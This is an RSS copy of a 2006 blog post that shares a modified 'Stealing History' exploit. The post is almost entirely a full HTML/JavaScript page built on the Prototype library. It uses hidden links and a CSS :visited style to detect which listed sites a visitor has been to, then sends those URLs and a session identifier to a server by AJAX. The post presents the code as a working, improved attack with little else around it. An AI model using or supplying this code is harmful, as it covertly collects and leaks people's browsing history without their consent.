Jesse Ezell Blog : Prototypehttp://weblogs.asp.net/jezell/archive/tags/Prototype/default.aspxTags: PrototypeenCommunityServer 2007 SP1 (Build: 20510.895)Stealing History (Part 2)http://weblogs.asp.net/jezell/archive/2006/08/26/Stealing-History-_2800_Part-2_2900_.aspxSat, 26 Aug 2006 19:32:00 GMTc06e2b9d-981a-45b4-a55f-ab0d8bbfdc1c:490775Jesse EzellJesse Ezell16http://weblogs.asp.net/jezell/rsscomments.aspx?PostID=490775http://weblogs.asp.net/jezell/archive/2006/08/26/Stealing-History-_2800_Part-2_2900_.aspx#comments<p>Cody Swann has a modified version of <a href="http://weblogs.asp.net/jezell/archive/2006/08/25/Stealing-History.aspx">the exploit</a> using prototype that works in IE and has support for AJAX requests:</p><pre>&lt;html&gt; &lt;head&gt; &lt;script type=&quot;text/javascript&quot; src=&quot;http://script.aculo.us/prototype.js&quot;&gt;&lt;/script&gt; &lt;/head&gt; &lt;body&gt; Have you been to these sites? &lt;script type=&quot;text/javascript&quot;&gt; Snoop = Class.create(); Snoop.prototype = { initialize: function(options) { this.options = Object.extend({ writeStyle: true, linkObjArray: null, //AN ARRAY OF JSON FORMATTED LINK OBJ IN THE FORM OF {link:&#39;http://...&#39;,text:&#39;nameOfSite&#39;} THAT WILL BE CHECKED identifier: &#39;&#39;, //IF SAVING THE DATA, THIS IS WHAT YOU WOULD LIKE TO USE TO IDENFIFY THE SESSON saveURL: null, //URL TO SEND THE DATA TO method: &#39;get&#39;, //METHOD USED IN AJAX SAVE transport: null, //TRANSPORT USED TO SEND SAVED DATA (XMLHTTPRequest by default) onComplete: function(visitedLinks)///FUNCTION CALLED AFTER PARSING LINKS { var dummy = document.createElement(&#39;ul&#39;); visitedLinks.each( function(linkObj) { var text = document.createTextNode(linkObj.text); var node = document.createElement(&#39;a&#39;); var li = document.createElement(&#39;li&#39;); node.appendChild(text); node.setAttribute(&#39;href&#39;,linkObj.link); li.appendChild(node); dummy.appendChild(li); } ); document.body.appendChild(dummy); }, onSaveComplete: function(){},///CALLBACK FOR AJAX FUNCTION ON SUCCESS onSaveError: function(){}///CALLBACK FOR AJAX FUNCTION ON FAILURE }, options || {}); this._visitedLinks = []; if(this.options.writeStyle) { document.write(&#39;&lt;style type=&quot;text/css&quot;&gt;a.testerLink:visited{display:block;height:1px;}&lt;/style&gt;&#39;); } this.collectVisitedLinks(); this.finish(); }, collectVisitedLinks: function() { var dummy = document.createElement(&#39;div&#39;); dummy.id = &#39;visitTestDiv&#39;; Element.setStyle(dummy,{visibility:&#39;hidden&#39;,height:&#39;1px&#39;,lineHeight:&#39;1px&#39;}); document.body.appendChild(dummy); var linkObjs = this.options.linkObjArray || [{link:&#39;http://new.com/&#39;,text:&#39;new&#39;},{link:&#39;http://new.2com/&#39;,text:&#39;new2&#39;},{link:&#39;http://google.com/&#39;,text:&#39;Google.com&#39;},{link:&#39;http://espn.go.com/&#39;,text:&#39;ESPN.com&#39;},{link:&#39;http://script.aculo.us/&#39;,text:&#39;Scriptaculous&#39;},{link:&#39;http://digg.com/&#39;,text:&#39;Digg&#39;},{link:&#39;http://blog.slimc.com/&#39;,text:&#39;Slimc.com&#39;},{link:&#39;http://www.cnn.com/&#39;,text:&#39;CNN.com&#39;},{link:&#39;http://www.yahoo.com/&#39;,text:&#39;Yahoo!&#39;},{link:&#39;http://myspace.com&#39;,text:&#39;MySpace&#39;},{link:&#39;http://www.ebay.com/&#39;,text:&#39;ebay&#39;},{link:&#39;http://wikipedia.org/&#39;,text:&#39;Wikipedia&#39;},{link:&#39;http://amazon.com/&#39;,text:&#39;Amazon.com&#39;},{link:&#39;http://sfbay.craigslist.org/&#39;,text:&quot;Craig&#39;s List&quot;}]; linkObjs.each( function(linkObj,count) { var text = document.createTextNode(linkObj.text); var node = document.createElement(&#39;a&#39;); node.setAttribute(&#39;href&#39;,linkObj.link); Element.addClassName(node,&#39;testerLink&#39;); dummy.appendChild(node); if(parseInt(Element.getHeight(node)) != 0) { this._visitedLinks.push(linkObj); } Element.remove(node); }.bind(this) ); Element.remove(dummy); }, finish: function() { if(this.options.saveURL) { var urls = this._visitedLinks.collect(function(link){ return link.link; }); urls = urls.join(&#39;,&#39;); urls = escape(urls.replace(/,$/,&#39;&#39;)); urls = urls.replace(/%2C/,&#39;,&#39;); new Ajax.Request(this.options.saveURL,{ transport: this.options.transport, method: this.options.method, parameters: &#39;id=&#39; + this.options.identifier + &#39;&amp;urls=&#39; + urls, onSuccess: this.options.onSaveComplete, onFailure: this.options.onSaveError }); } this.options.onComplete(this._visitedLinks); } }; new Snoop({saveURL:&#39;/right/here&#39;}); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; </pre><p>[1] <a href="http://blog.slimc.com/prototype-javascript-ending-privacy-one-visit-at-a-time/">http://blog.slimc.com/prototype-javascript-ending-privacy-one-visit-at-a-time/</a></p><img src="http://weblogs.asp.net/aggbug.aspx?PostID=490775" width="1" height="1">AJAXGeneral Software DevelopmentJavascriptHackCody SwannPrototype